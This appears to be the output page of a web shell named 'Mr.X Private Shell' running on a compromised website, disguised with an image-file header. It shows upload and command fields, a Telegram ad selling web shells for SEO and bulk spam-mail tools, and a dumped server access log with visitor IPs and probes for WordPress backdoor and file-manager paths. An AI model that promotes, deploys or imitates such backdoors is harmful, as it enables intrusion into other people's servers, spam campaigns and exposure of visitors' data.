����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

njujpgyl@216.73.216.165: ~ $
114.119.134.152 - - [06/Jul/2026:12:06:48 +0000] "GET /?r=11194597101400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.131.245 - - [06/Jul/2026:12:09:39 +0000] "GET /?r=11184806001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:12:12:36 +0000] "GET /?r=11183953011400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.50 - - [06/Jul/2026:12:15:33 +0000] "GET /?r=11179670031400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.50 - - [06/Jul/2026:12:18:37 +0000] "GET /?r=11159182021400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:12:21:28 +0000] "GET /?r=11150157031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:12:24:25 +0000] "GET /?r=11148798041400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.229 - - [06/Jul/2026:12:27:26 +0000] "GET /?r=11146853031400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.193 - - [06/Jul/2026:12:30:21 +0000] "GET /?r=11130749051400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.50 - - [06/Jul/2026:12:33:17 +0000] "GET /?r=11123467041400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
198.235.24.152 - - [06/Jul/2026:12:35:46 +0000] "GET / HTTP/1.1" 200 69753 "http://delhidreamescorts.com/" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
114.119.135.229 - - [06/Jul/2026:12:36:14 +0000] "GET /?r=11085923051400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
120.240.178.157 - - [06/Jul/2026:12:37:47 +0000] "GET /robots.txt HTTP/1.1" 200 78 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.4281.88 Safari/537.36 QIHU 360SE"
114.119.135.229 - - [06/Jul/2026:12:39:12 +0000] "GET /?r=11074146041400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
192.241.155.166 - - [06/Jul/2026:12:41:37 +0000] "GET / HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36"
118.71.38.140 - - [06/Jul/2026:12:45:42 +0000] "GET http://www.delhidreamescorts.com/amar-colony-call-girls.html HTTP/1.1" 200 25134 "-" "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4121.813 Safari/537.36"
114.119.130.199 - - [06/Jul/2026:12:42:09 +0000] "GET /?r=11062849031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
114.119.133.14 - - [06/Jul/2026:12:45:06 +0000] "GET /?r=11054376041400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.193 - - [06/Jul/2026:12:48:03 +0000] "GET /?r=11047662011400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:12:51:00 +0000] "GET /?r=11040873101400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:12:53:57 +0000] "GET /?r=11040034001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:12:57:00 +0000] "GET /?r=11032047001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.193 - - [06/Jul/2026:13:00:05 +0000] "GET /?r=11024144021400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
172.235.52.56 - - [06/Jul/2026:13:05:45 +0000] "GET / HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_6) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.698.0 Safari/534.24"
114.119.134.152 - - [06/Jul/2026:13:05:47 +0000] "GET /?r=10939277021400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.229 - - [06/Jul/2026:13:02:49 +0000] "GET /?r=10986870011400 HTTP/1.1" 504 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.158.50 - - [06/Jul/2026:13:08:51 +0000] "GET /?r=10931539041400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:13:14:39 +0000] "GET /?r=10911242051400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:13:11:41 +0000] "GET /?r=10924873021400 HTTP/1.1" 504 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
114.119.158.50 - - [06/Jul/2026:13:17:38 +0000] "GET /?r=10901992001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:13:20:34 +0000] "GET /?r=10884173011400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:13:23:38 +0000] "GET /?r=10882655061400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:13:26:29 +0000] "GET /?r=1087846001400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
191.237.255.150 - - [06/Jul/2026:13:26:06 +0000] "GET /wp-content/plugins/hellopress/wp_filemanager.php HTTP/1.1" 200 69753 "-" "-"
114.119.158.50 - - [06/Jul/2026:13:29:26 +0000] "GET /?r=10878432041400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.193 - - [06/Jul/2026:13:32:22 +0000] "GET /?r=10877492001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
173.208.198.210 - - [06/Jul/2026:13:32:59 +0000] "GET /?testPage HTTP/1.1" 200 92 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
143.244.57.92 - - [06/Jul/2026:13:35:09 +0000] "GET / HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
114.119.131.245 - - [06/Jul/2026:13:35:21 +0000] "GET /?r=11205781041400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
143.244.57.92 - - [06/Jul/2026:13:36:09 +0000] "GET / HTTP/1.1" 200 8192 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:09 +0000] "GET /wp-includes/wlwmanifest.xml HTTP/1.1" 200 281952 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:13 +0000] "GET /xmlrpc.php?rsd HTTP/1.1" 403 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:14 +0000] "GET / HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:14 +0000] "GET /blog/wp-includes/wlwmanifest.xml HTTP/1.1" 200 279996 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:18 +0000] "GET /web/wp-includes/wlwmanifest.xml HTTP/1.1" 200 280819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:21 +0000] "GET /wordpress/wp-includes/wlwmanifest.xml HTTP/1.1" 200 281514 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:24 +0000] "GET /website/wp-includes/wlwmanifest.xml HTTP/1.1" 200 280824 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:26 +0000] "GET /wp/wp-includes/wlwmanifest.xml HTTP/1.1" 200 279111 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:29 +0000] "GET /news/wp-includes/wlwmanifest.xml HTTP/1.1" 200 279982 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:32 +0000] "GET /2018/wp-includes/wlwmanifest.xml HTTP/1.1" 200 279306 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:35 +0000] "GET /2019/wp-includes/wlwmanifest.xml HTTP/1.1" 200 277970 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:38 +0000] "GET /shop/wp-includes/wlwmanifest.xml HTTP/1.1" 200 279124 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:41 +0000] "GET /wp1/wp-includes/wlwmanifest.xml HTTP/1.1" 200 281340 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:43 +0000] "GET /test/wp-includes/wlwmanifest.xml HTTP/1.1" 200 280810 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:47 +0000] "GET /media/wp-includes/wlwmanifest.xml HTTP/1.1" 200 279668 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:49 +0000] "GET /wp2/wp-includes/wlwmanifest.xml HTTP/1.1" 200 278998 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:52 +0000] "GET /site/wp-includes/wlwmanifest.xml HTTP/1.1" 200 278312 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:54 +0000] "GET /cms/wp-includes/wlwmanifest.xml HTTP/1.1" 200 280987 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
143.244.57.92 - - [06/Jul/2026:13:37:56 +0000] "GET /sito/wp-includes/wlwmanifest.xml HTTP/1.1" 200 279630 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
114.119.131.245 - - [06/Jul/2026:13:38:17 +0000] "GET /?r=1084044001400 HTTP/1.1" 504 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:13:44:20 +0000] "GET /?r=1080879011400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:13:47:09 +0000] "GET /?r=10801988071400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:13:50:07 +0000] "GET /?r=10801778031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:13:53:15 +0000] "GET /?r=10801748011400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
216.73.163.59 - - [06/Jul/2026:13:57:03 +0000] "GET / HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.0"
114.119.135.229 - - [06/Jul/2026:13:56:01 +0000] "GET /?r=10798465061400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:13:58:58 +0000] "GET /?r=10794191131400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:14:01:55 +0000] "GET /?r=10785806031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.134.152 - - [06/Jul/2026:14:04:52 +0000] "GET /?r=10781210051400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:14:07:51 +0000] "GET /?r=10780502081400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
198.181.32.58 - - [06/Jul/2026:14:08:49 +0000] "GET //index.php?params HTTP/1.1" 200 425 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))"
198.181.32.58 - - [06/Jul/2026:14:08:50 +0000] "GET //index.php?dump HTTP/1.1" 200 254692 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))"
198.181.32.58 - - [06/Jul/2026:14:08:52 +0000] "GET //abc?dump HTTP/1.1" 200 237215 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html; (greenwich&lewisham))"
114.119.130.199 - - [06/Jul/2026:14:10:48 +0000] "GET /?r=10773148021400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:14:16:43 +0000] "GET /?r=10763900031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:14:19:41 +0000] "GET /?r=10762944001400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 8.0.0; SM-G955U Build/R16NW) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/148.0.0.0 Mobile Safari/537.36"
102.215.245.76 - - [06/Jul/2026:14:20:31 +0000] "GET http://www.delhidreamescorts.com/jaipur-call-girls-photos.html HTTP/1.1" 200 21485 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"
47.15.244.141 - - [06/Jul/2026:14:22:02 +0000] "GET http://www.delhidreamescorts.com/jawala-heri-call-girls.html HTTP/1.1" 200 25136 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"
114.119.145.193 - - [06/Jul/2026:14:22:39 +0000] "GET /?r=10770977011400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.145.193 - - [06/Jul/2026:14:25:35 +0000] "GET /?r=10746526041400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.146.70 - - [06/Jul/2026:14:28:33 +0000] "GET /?r=10733905031400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
43.130.39.254 - - [06/Jul/2026:14:31:04 +0000] "GET / HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
114.119.130.199 - - [06/Jul/2026:14:37:28 +0000] "GET /?r=10690706021400 HTTP/1.1" 508 288 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.135.229 - - [06/Jul/2026:14:34:28 +0000] "GET /?r=10716736001400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.133.14 - - [06/Jul/2026:14:31:32 +0000] "GET /?r=10731340001400 HTTP/1.1" 504 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
114.119.130.199 - - [06/Jul/2026:14:40:21 +0000] "GET /?r=10686967111400 HTTP/1.1" 200 69753 "http://www.delhidreamescorts.com/sitemap.xml" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (HTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
143.198.175.13 - - [06/Jul/2026:14:41:42 +0000] "GET /wp-admin/includes/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:41:43 +0000] "GET /wp-admin/maint/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:41:59 +0000] "GET /wp-admin/js/widgets/ HTTP/1.1" 508 288 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:41:02 +0000] "GET /wp-admin/css/ HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
143.198.175.13 - - [06/Jul/2026:14:41:27 +0000] "GET /wp-admin/css/colors/blue/ HTTP/1.1" 200 69753 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36"
